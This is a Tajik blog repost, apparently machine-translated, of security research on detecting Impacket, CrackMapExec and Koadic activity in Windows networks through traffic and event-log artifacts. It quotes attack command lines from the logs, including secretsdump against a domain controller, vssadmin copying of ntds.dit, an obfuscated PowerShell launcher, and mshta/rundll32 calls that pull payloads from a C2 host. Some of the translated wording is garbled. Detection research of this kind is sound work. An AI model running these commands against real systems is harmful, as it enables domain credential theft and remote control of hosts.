ProHoster > Blog > Идораи > Чӣ гуна ҳамлаҳоро ба инфрасохтори Windows муайян кардан мумкин аст: омӯзиши абзорҳои ҳакерӣ

Чӣ гуна ҳамлаҳоро ба инфрасохтори Windows муайян кардан мумкин аст: омӯзиши абзорҳои ҳакерӣ

Чӣ гуна ҳамлаҳоро ба инфрасохтори Windows муайян кардан мумкин аст: омӯзиши абзорҳои ҳакерӣ

Шумораи ҳамлаҳо дар бахши корпоративӣ ҳар сол меафзояд: масалан дар соли 2017, 13% ҳодисаҳои нодири бештар ба қайд гирифта шуданд нисбат ба соли 2016 ва дар охири соли 2018 - 27% ҳодисаҳои зиёдназар ба давраи гузашта. Аз ҷумла онҳое, ки асбоби асосии корӣ системаи оператсионии Windows мебошад. Дар солҳои 2017-2018, APT Dragonfly, APT28, APT MuddyWater ба созмонҳои ҳукуматӣ ва низомии Аврупо, Амрикои Шимолӣ ва Арабистони Саудӣ ҳамлаҳо анҷом дод. Ва мо барои ин се асбобро истифода бурдем - Импакет, CrackMapExec и Коадич. Рамзи сарчашмаи онҳо дар GitHub кушода ва дастрас аст.

Қобили зикр аст, ки ин воситаҳо на барои воридшавии ибтидоӣ, балки барои таҳияи ҳамла дар дохили инфрасохтор истифода мешаванд. Ҳамлагарон онҳоро дар марҳилаҳои гуногуни ҳамла пас аз ворид шудан ба периметр истифода мебаранд. Дар омади гап, ошкор кардан душвор аст ва аксар вақт танҳо бо ёрии технология муайян кардани нишонаҳои созиш дар трафики шабака ё асбобхое, ки имкон медиханд амалҳои фаъоли ҳамлагарро пас аз ворид шудан ба инфрасохтор муайян кунед. Воситаҳо вазифаҳои гуногунро аз интиқоли файлҳо то ҳамкорӣ бо реестр ва иҷро кардани фармонҳо дар мошини дурдаст таъмин мекунанд. Мо омӯзиши ин асбобҳоро барои муайян кардани фаъолияти шабакавии онҳо анҷом додем.

Мо чӣ кор кардан лозим буд:

  • Бифаҳмед, ки асбобҳои ҳакерӣ чӣ гуна кор мекунанд. Бифаҳмед, ки ҳамлагарон бояд аз чӣ истифода баранд ва кадом технологияҳоро истифода баранд.
  • Ҷустуҷӯ кунед, ки он чизеро, ки воситаҳои амнияти иттилоотӣ дар марҳилаҳои аввали ҳамла ошкор намекунанд. Марҳилаи иктишофӣ метавонад аз сабаби он, ки ҳамлакунанда ҳамлагари дохилӣ аст, ё аз он сабаб, ки ҳамлакунанда аз сӯрохи инфрасохтор, ки қаблан маълум набуд, истифода мебарад. Барои барқарор кардани тамоми занҷири амалҳои ӯ имконпазир мегардад, аз ин рӯ хоҳиши муайян кардани ҳаракати минбаъда.
  • Бартараф кардани мусбатҳои бардурӯғ аз абзорҳои ошкоркунии ҳамла. Фаромуш кардан лозим нест, ки хангоми фа-кат дар асоси разведка амалиёти муайян ошкор карда мешавад, ба хатохои зуд-зуд рох додан мумкин аст. Одатан дар инфрасохтор шумораи кофии роҳҳо мавҷуданд, ки аз роҳҳои қонунӣ дар назари аввал фарқ намекунанд, барои ба даст овардани ҳама гуна маълумот.

Ин воситаҳо ба ҳамлагарон чӣ медиҳанд? Агар ин Impacket бошад, он гоҳ ҳамлагарон як китобхонаи калони модулҳоро мегиранд, ки метавонанд дар марҳилаҳои гуногуни ҳамла, ки пас аз шикастани периметр истифода мешаванд, истифода шаванд. Бисёр асбобҳо модулҳои Impacket-ро дар дохили худ истифода мебаранд - масалан, Metasploit. Он дорои dcomexec ва wmiexec барои иҷрои фармонҳои дурдаст, secretsdump барои гирифтани ҳисобҳо аз хотира, ки аз Impacket илова шудаанд. Дар натича дуруст ошкор намудани фаъолияти ин гуна китобхона ошкор намудани њосилањоро таъмин мекунад.

Тасодуфан нест, ки эҷодкорон дар бораи CrackMapExec (ё танҳо CME) "Powered by Impacket" навиштаанд. Илова бар ин, CME дорои функсияҳои омода барои сенарияҳои маъмул аст: Mimikatz барои гирифтани паролҳо ё хэшҳои онҳо, татбиқи Meterpreter ё агенти Empire барои иҷрои дурдаст ва Bloodhound дар киштӣ.

Воситаи сеюме, ки мо интихоб кардем, Koadic буд. Ин хеле нав аст, он дар конфронси байналмилалии ҳакерҳои DEFCON 25 дар соли 2017 муаррифӣ карда шуд ва бо равиши ғайристандартӣ фарқ мекунад: он тавассути HTTP, Java Script ва Microsoft Visual Basic Script (VBS) кор мекунад. Ин равишро зиндагӣ берун аз замин меноманд: асбоб маҷмӯи вобастагӣ ва китобхонаҳои дар Windows сохташударо истифода мебарад. Эҷодкорон онро COM Command & Control ё C3 меноманд.

ТАЪСИР

Функсияи Impacket хеле васеъ аст, аз разведка дар дохили AD ва ҷамъоварии маълумот аз серверҳои дохилии MS SQL то усулҳои гирифтани маълумот: ин ҳамлаи релеии SMB ва гирифтани файли ntds.dit, ки дорои хэшҳои паролҳои корбар аз контролери домен мебошад. Impacket инчунин бо истифода аз чаҳор усули гуногун фармонҳоро аз фосилаи дур иҷро мекунад: WMI, Windows Scheduler Service Management, DCOM ва SMB ва барои ин кор маълумоти эътимодномаро талаб мекунад.

Махфӣ

Биёед ба секретҳо назар андозем. Ин модулест, ки метавонад ҳам мошинҳои корбар ва ҳам контроллерҳои доменро ҳадаф қарор диҳад. Он метавонад барои ба даст овардани нусхаҳои минтақаҳои хотираи LSA, SAM, SECURITY, NTDS.dit истифода шавад, бинобар ин онро дар марҳилаҳои гуногуни ҳамла дидан мумкин аст. Қадами аввал дар кори модул аутентификатсия тавассути SMB мебошад, ки барои ба таври худкор анҷом додани ҳамлаи Pass the Hash пароли корбар ё хеши онро талаб мекунад. Баъдан дархост барои кушодани дастрасӣ ба Менеҷери Идоракунии Service (SCM) ва дастрасӣ ба реестр тавассути протоколи winreg меояд, ки бо истифода аз он ҳамлакунанда метавонад маълумоти филиалҳои манфиатдорро пайдо кунад ва тавассути SMB натиҷаҳоро ба даст орад.

Дар расми. 1 мо мебинем, ки чӣ тавр ҳангоми истифодаи протоколи winreg дастрасӣ тавассути калиди реестр бо LSA ба даст оварда мешавад. Барои ин, фармони DCERPC-ро бо opcode 15 - OpenKey истифода баред.

Чӣ гуна ҳамлаҳоро ба инфрасохтори Windows муайян кардан мумкин аст: омӯзиши абзорҳои ҳакерӣ
Райс. 1. Кушодани калиди реестр бо истифода аз протоколи winreg

Баъдан, вақте ки дастрасӣ ба калид ба даст меояд, арзишҳо бо фармони SaveKey бо opcode 20 захира карда мешаванд. Impacket ин корро ба таври хеле мушаххас анҷом медиҳад. Он арзишҳоро дар файле нигоҳ медорад, ки номаш сатри 8 аломати тасодуфӣ мебошад, ки бо .tmp замима шудааст. Илова бар ин, боркунии минбаъдаи ин файл тавассути SMB аз феҳристи System32 сурат мегирад (расми 2).

Чӣ гуна ҳамлаҳоро ба инфрасохтори Windows муайян кардан мумкин аст: омӯзиши абзорҳои ҳакерӣ
Райс. 2. Схемаи гирифтани калиди реестр аз мошини дурдаст

Маълум мешавад, ки чунин фаъолиятро дар шабака тавассути дархостҳо ба шохаҳои муайяни реестр бо истифода аз протоколи winreg, номҳои мушаххас, фармонҳо ва тартиби онҳо муайян кардан мумкин аст.

Ин модул инчунин дар сабти рӯйдодҳои Windows пайҳо мегузорад, ки ошкор кардани онро осон мекунад. Масалан, дар натичаи ичрои фармон

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Дар сабти Windows Server 2016 мо пайдарпайии асосии рӯйдодҳоро мебинем:

1. 4624 - Logon дурдаст.
2. 5145 - тафтиши ҳуқуқи дастрасӣ ба хидмати дурдасти winreg.
3. 5145 - тафтиши ҳуқуқи дастрасии файл дар феҳристи System32. Файл дорои номи тасодуфии дар боло зикршуда.
4. 4688 - эҷоди як раванди cmd.exe, ки vssadmin-ро оғоз мекунад:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - эҷод кардани раванд бо фармони:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - эҷод кардани раванд бо фармони:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - эҷод кардани раванд бо фармони:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

Мисли бисёре аз абзорҳои пас аз истисмор, Impacket дорои модулҳо барои аз фосилаи дур иҷро кардани фармонҳо мебошад. Мо ба smbexec тамаркуз хоҳем кард, ки қабати интерактивии фармонро дар мошини дурдаст таъмин мекунад. Ин модул инчунин аутентификатсияро тавассути SMB, ё бо парол ё ҳеш парол талаб мекунад. Дар расми. Дар расми 3 мо мисоли кори чунин асбобро мебинем, дар ин ҳолат он консоли администратори маҳаллӣ мебошад.

Чӣ гуна ҳамлаҳоро ба инфрасохтори Windows муайян кардан мумкин аст: омӯзиши абзорҳои ҳакерӣ
Райс. 3. Консоли интерактивии smbexec

Қадами аввалини smbexec пас аз тасдиқи аутентификатсия ин кушодани SCM бо фармони OpenSCManagerW мебошад (15). Дархост назаррас аст: майдони MachineName DUMMY аст.

Чӣ гуна ҳамлаҳоро ба инфрасохтори Windows муайян кардан мумкин аст: омӯзиши абзорҳои ҳакерӣ
Райс. 4. Дархост барои кушодани Менеҷери идоракунии хидмат

Баъдан, хидмат бо ёрии фармони CreateServiceW сохта мешавад (12). Дар мавриди smbexec, мо метавонем ҳар дафъа як мантиқи сохтани фармонро бубинем. Дар расми. 5 сабз параметрҳои фармони тағирнашавандаро нишон медиҳад, зард нишон медиҳад, ки ҳамлагар чиро тағир дода метавонад. Ба осонӣ дидан мумкин аст, ки номи файли иҷрошаванда, директорияи он ва файли баромадро тағир додан мумкин аст, аммо боқимондаро бе халалдор кардани мантиқи модули Impacket тағир додан душвортар аст.

Чӣ гуна ҳамлаҳоро ба инфрасохтори Windows муайян кардан мумкин аст: омӯзиши абзорҳои ҳакерӣ
Райс. 5. Дархост барои сохтани хадамот бо истифода аз Менеҷери Идоракунии Хадамоти

Smbexec инчунин дар сабти рӯйдодҳои Windows осори аён мегузорад. Дар сабти Windows Server 2016 барои қабати фармони интерактивӣ бо фармони ipconfig, мо пайдарпайии асосии рӯйдодҳоро мебинем:

1. 4697 — насби хидмат дар мошини ҷабрдида:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - эҷоди раванди cmd.exe бо аргументҳои банди 1.
3. 5145 - тафтиши ҳуқуқи дастрасӣ ба файли __output дар директорияи C$.
4. 4697 — насби хидмат дар мошини ҷабрдида.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - эҷоди раванди cmd.exe бо аргументҳои банди 4.
6. 5145 - тафтиши ҳуқуқи дастрасӣ ба файли __output дар директорияи C$.

Импакет асоси таҳияи асбобҳои ҳамла мебошад. Он қариб ҳамаи протоколҳои инфрасохтори Windows-ро дастгирӣ мекунад ва дар айни замон хусусиятҳои хоси худро дорад. Дар ин ҷо дархостҳои мушаххаси winreg ва истифодаи SCM API бо ташаккули фармонҳои хос, формати номи файл ва мубодилаи SMB SYSTEM32 мебошанд.

CRACKMAPEXEC

Воситаи CME асосан барои автоматикунонии он амалҳои муқаррарие, ки ҳамлакунанда бояд барои пешрафт дар дохили шабака анҷом диҳад, тарҳрезӣ шудааст. Он ба шумо имкон медиҳад, ки дар якҷоягӣ бо агенти маъруфи Empire ва Meterpreter кор кунед. Барои пинҳон кардани фармонҳо, CME метавонад онҳоро парешон кунад. Бо истифода аз Bloodhound (асбоби алоҳидаи иктишофӣ), ҳамлакунанда метавонад ҷустуҷӯи сеанси фаъоли мудири доменро автоматӣ кунад.

хунхор

Bloodhound, ҳамчун як воситаи мустақил, имкон медиҳад, ки иктишофи пешрафта дар дохили шабака. Он маълумотро дар бораи корбарон, мошинҳо, гурӯҳҳо, сессияҳо ҷамъ меорад ва ҳамчун скрипти PowerShell ё файли бинарӣ дода мешавад. Барои ҷамъоварии маълумот протоколҳои LDAP ё SMB асосёфта истифода мешаванд. Модули ҳамгироии CME имкон медиҳад, ки Bloodhound ба мошини ҷабрдида зеркашӣ карда шавад, пас аз иҷро маълумоти ҷамъовардашударо иҷро кунад ва қабул кунад ва ба ин васила амалҳоро дар система автоматӣ кунад ва онҳоро камтар намоён кунад. Шабакаи графикии Bloodhound маълумоти ҷамъшударо дар шакли графикҳо пешкаш мекунад, ки ба шумо имкон медиҳад, ки роҳи кӯтоҳтаринро аз мошини ҳамлагар то мудири домен пайдо кунед.

Чӣ гуна ҳамлаҳоро ба инфрасохтори Windows муайян кардан мумкин аст: омӯзиши абзорҳои ҳакерӣ
Райс. 6. Интерфейси Bloodhound

Барои кор кардан дар мошини ҷабрдида, модул бо истифода аз ATSVC ва SMB вазифа эҷод мекунад. ATSVC интерфейсест барои кор бо Windows Task Scheduler. CME функсияи NetrJobAdd(1)-и худро барои эҷоди вазифаҳо дар шабака истифода мебарад. Намунаи он чизе, ки модули CME мефиристад, дар расм нишон дода шудааст. 7: Ин занги фармони cmd.exe ва рамзи печида дар шакли далелҳо дар формати XML мебошад.

Чӣ гуна ҳамлаҳоро ба инфрасохтори Windows муайян кардан мумкин аст: омӯзиши абзорҳои ҳакерӣ
Расми 7. Эҷоди вазифа тавассути CME

Пас аз он ки супориш барои иҷро пешниҳод карда шуд, мошини ҷабрдида худи Bloodhound-ро оғоз мекунад ва инро дар ҳаракат дидан мумкин аст. Модул бо дархостҳои LDAP барои ба даст овардани гурӯҳҳои стандартӣ, рӯйхати ҳамаи мошинҳо ва корбарон дар домен ва гирифтани маълумот дар бораи сеансҳои фаъоли корбар тавассути дархости SRVSVC NetSessEnum тавсиф мешавад.

Чӣ гуна ҳамлаҳоро ба инфрасохтори Windows муайян кардан мумкин аст: омӯзиши абзорҳои ҳакерӣ
Райс. 8. Гирифтани рӯйхати ҷаласаҳои фаъол тавассути SMB

Илова бар ин, оғоз кардани Bloodhound дар мошини ҷабрдида бо фаъол кардани аудит бо як ҳодиса бо ID 4688 (офариниши раванд) ва номи раванд ҳамроҳ мешавад. «C:WindowsSystem32cmd.exe». Чизи ҷолиб дар он далелҳои сатри фармон мебошанд:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

Модули enum_avproducts аз нуқтаи назари функсия ва татбиқ хеле ҷолиб аст. WMI ба шумо имкон медиҳад, ки забони дархости WQL-ро барои дарёфти маълумот аз объектҳои гуногуни Windows истифода баред, ки аслан он чизест, ки ин модули CME истифода мебарад. Он ба синфҳои AntiSpywareProduct ва AntiMirusProduct дар бораи асбобҳои муҳофизатие, ки дар мошини ҷабрдида насб шудааст, дархостҳо тавлид мекунад. Барои ба даст овардани маълумоти зарурӣ, модул ба фазои номи rootSecurityCenter2 пайваст мешавад, сипас дархости WQL тавлид мекунад ва посух мегирад. Дар расми. Дар расми 9 мундариҷаи чунин дархостҳо ва ҷавобҳо нишон дода шудааст. Дар мисоли мо, Windows Defender ёфт шуд.

Чӣ гуна ҳамлаҳоро ба инфрасохтори Windows муайян кардан мумкин аст: омӯзиши абзорҳои ҳакерӣ
Райс. 9. Фаъолияти шабакавии модули enum_avproducts

Аксар вақт аудити WMI (Trace WMI-Activity), ки дар чорабиниҳои онҳо шумо метавонед маълумоти муфидро дар бораи дархостҳои WQL пайдо кунед, ғайрифаъол карда мешавад. Аммо агар он фаъол бошад, пас агар скрипти enum_avproducts иҷро шавад, ҳодиса бо ID 11 захира карда мешавад.Дар он номи корбаре, ки дархост фиристодааст ва номро дар фазои номи rootSecurityCenter2 дарбар мегирад.

Ҳар як модули CME артефактҳои худро дошт, хоҳ он дархостҳои мушаххаси WQL ё эҷоди як намуди муайяни вазифа дар нақшаи вазифа бо иштибоҳ ва фаъолияти хоси Bloodhound дар LDAP ва SMB.

КОАДИК

Хусусияти фарқкунандаи Koadic истифодаи тарҷумонҳои JavaScript ва VBScript дар Windows сохта шудааст. Ба ин маъно, он аз тамоюли замин зиндагӣ мекунад - яъне он вобастагии беруна надорад ва асбобҳои стандартии Windows-ро истифода мебарад. Ин асбобест барои пурраи Фармон ва Назорат (CnC), зеро пас аз сироят дар мошин "имплантатсия" насб карда мешавад, ки он имкон медиҳад, ки идора карда шавад. Чунин мошин, дар истилоҳоти Коадик, "зомби" номида мешавад. Агар барои амалиёти пурра дар тарафи ҷабрдида имтиёзҳо нокифоя бошанд, Koadic имкон дорад, ки онҳоро бо истифода аз усулҳои bypass Control Account User (UAC bypass) афзоиш диҳад.

Чӣ гуна ҳамлаҳоро ба инфрасохтори Windows муайян кардан мумкин аст: омӯзиши абзорҳои ҳакерӣ
Райс. 10. Koadic Shell

Ҷабрдида бояд иртиботро бо сервери Фармон ва Назорат оғоз кунад. Барои ин, вай бояд бо URI қаблан омодашуда тамос гирад ва бо истифода аз яке аз статерҳо бадани асосии Коадикро қабул кунад. Дар расми. Дар расми 11 намунаи статер мшта нишон дода шудааст.

Чӣ гуна ҳамлаҳоро ба инфрасохтори Windows муайян кардан мумкин аст: омӯзиши абзорҳои ҳакерӣ
Райс. 11. Оғози сессия бо сервери CnC

Дар асоси тағирёбандаи ҷавобии WS маълум мешавад, ки иҷроиш тавассути WScript.Shell сурат мегирад ва тағирёбандаҳои STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE дорои маълумоти калидӣ дар бораи параметрҳои сессияи ҷорӣ мебошанд. Ин аввалин ҷуфти дархост-ҷавоб дар пайвасти HTTP бо сервери CnC мебошад. Дархостҳои минбаъда бевосита ба фаъолияти модулҳои (имплантатсияҳо) даъватшуда алоқаманданд. Ҳама модулҳои Koadic танҳо бо сессияи фаъол бо CnC кор мекунанд.

Мимикатз

Ҳамон тавре ки CME бо Bloodhound кор мекунад, Koadic бо Mimikatz ҳамчун барномаи алоҳида кор мекунад ва роҳҳои зиёде барои оғоз кардани он дорад. Дар зер як ҷуфти дархост-ҷавоб барои зеркашии импланти Mimikatz оварда шудааст.

Чӣ гуна ҳамлаҳоро ба инфрасохтори Windows муайян кардан мумкин аст: омӯзиши абзорҳои ҳакерӣ
Райс. 12. Мимикатзро ба Коадич интиқол диҳед

Шумо мебинед, ки формати URI дар дархост чӣ гуна тағир ёфтааст. Ҳоло он дорои арзиши тағирёбандаи csrf мебошад, ки барои модули интихобшуда масъул аст. Ба номи вай эътибор надиҳед; Ҳамаи мо медонем, ки CSRF одатан ба таври гуногун фаҳмида мешавад. Ҷавоб ҳамон як ҷузъи асосии Коадич буд, ки ба он рамзи марбут ба Мимикатз илова карда шудааст. Ин хеле калон аст, бинобар ин биёед ба нуктаҳои асосӣ назар кунем. Дар ин ҷо мо китобхонаи Mimikatz дорем, ки дар base64 рамзгузорӣ шудааст, синфи силсилавии .NET, ки онро ворид мекунад ва далелҳо барои оғози Mimikatz. Натиҷаи иҷро тавассути шабака дар матни равшан интиқол дода мешавад.

Чӣ гуна ҳамлаҳоро ба инфрасохтори Windows муайян кардан мумкин аст: омӯзиши абзорҳои ҳакерӣ
Райс. 13. Натиҷаи кор кардани Mimikatz дар мошини дурдаст

Exec_cmd

Koadic инчунин модулҳое дорад, ки метавонанд фармонҳоро аз фосилаи дур иҷро кунанд. Дар ин ҷо мо ҳамон усули тавлиди URI ва тағирёбандаҳои шиноси sid ва csrf-ро хоҳем дид. Дар мавриди модули exec_cmd, код ба бадан илова карда мешавад, ки қодир ба иҷрои фармонҳои қабеҳ аст. Дар зер чунин код нишон дода шудааст, ки дар посухи HTTP-и сервери CnC мавҷуд аст.

Чӣ гуна ҳамлаҳоро ба инфрасохтори Windows муайян кардан мумкин аст: омӯзиши абзорҳои ҳакерӣ
Райс. 14. Рамзи имплантатсия exec_cmd

Тағирёбандаи GAWTUUGCFI бо атрибути шиноси WS барои иҷрои код лозим аст. Бо ёрии он имплант ҷабҳаро даъват мекунад, ки ду шохаи кодро коркард мекунад - shell.exec бо баргардонидани ҷараёни додаҳои баромад ва shell.run бе бозгашт.

Koadic як асбоби маъмулӣ нест, аммо он артефактҳои худро дорад, ки тавассути онҳо дар трафики қонунӣ пайдо кардан мумкин аст:

  • ташаккули махсуси дархостҳои HTTP,
  • бо истифода аз API winHttpRequests,
  • сохтани объекти WScript.Shell тавассути ActiveXObject,
  • мақоми калони иҷрошаванда.

Пайвастагии ибтидоӣ аз ҷониби статер оғоз мешавад, бинобар ин, фаъолияти онро тавассути рӯйдодҳои Windows муайян кардан мумкин аст. Барои mshta, ин ҳодисаи 4688 мебошад, ки эҷоди равандро бо атрибути оғоз нишон медиҳад:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Ҳангоме ки Koadic кор мекунад, шумо метавонед 4688 рӯйдодҳои дигарро бо атрибутҳое бубинед, ки онро комилан тавсиф мекунанд:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

натиҷаҳои

Зиндагӣ аз рӯи тамоюли замин дар байни ҷинояткорон маъруфият пайдо мекунад. Онҳо асбобҳо ва механизмҳои дар Windows сохташударо барои эҳтиёҷоти худ истифода мебаранд. Мо мебинем, ки абзорҳои маъмули Koadic, CrackMapExec ва Impacket бо риояи ин принсип дар гузоришҳои APT бештар пайдо мешаванд. Миқдори форкҳо дар GitHub барои ин асбобҳо низ меафзояд ва навҳои нав пайдо мешаванд (ҳоло тақрибан ҳазор нафари онҳо вуҷуд доранд). Ин тамоюл бо сабаби соддагии худ маъруфият пайдо мекунад: ҳамлагарон ба асбобҳои тарафи сеюм ниёз надоранд; онҳо аллакай дар мошинҳои қурбониён ҳастанд ва ба онҳо дар канорагирӣ аз чораҳои амниятӣ кӯмак мекунанд. Мо ба омӯзиши алоқаи шабакавӣ диққат медиҳем: ҳар як асбоби дар боло тавсифшуда дар трафики шабака пайҳои худро мегузорад; муфассал омухтани онхо ба мо имконият дод, ки махсулотамонро омузем Кашфи ҳамлаи шабакавии PT ошкор кардани онҳо, ки дар ниҳоят барои таҳқиқи тамоми силсилаи ҳодисаҳои киберӣ бо онҳо кӯмак мекунад.

Муаллифон:

  • Антон Тюрин, Сардори шӯъбаи хадамоти коршиносии Маркази амнияти PT Expert Technologies
  • Егор Подмоков, коршиноси Маркази амнияти PT Expert, Positive Technologies

Манбаъ: will.com

Илова Эзоҳ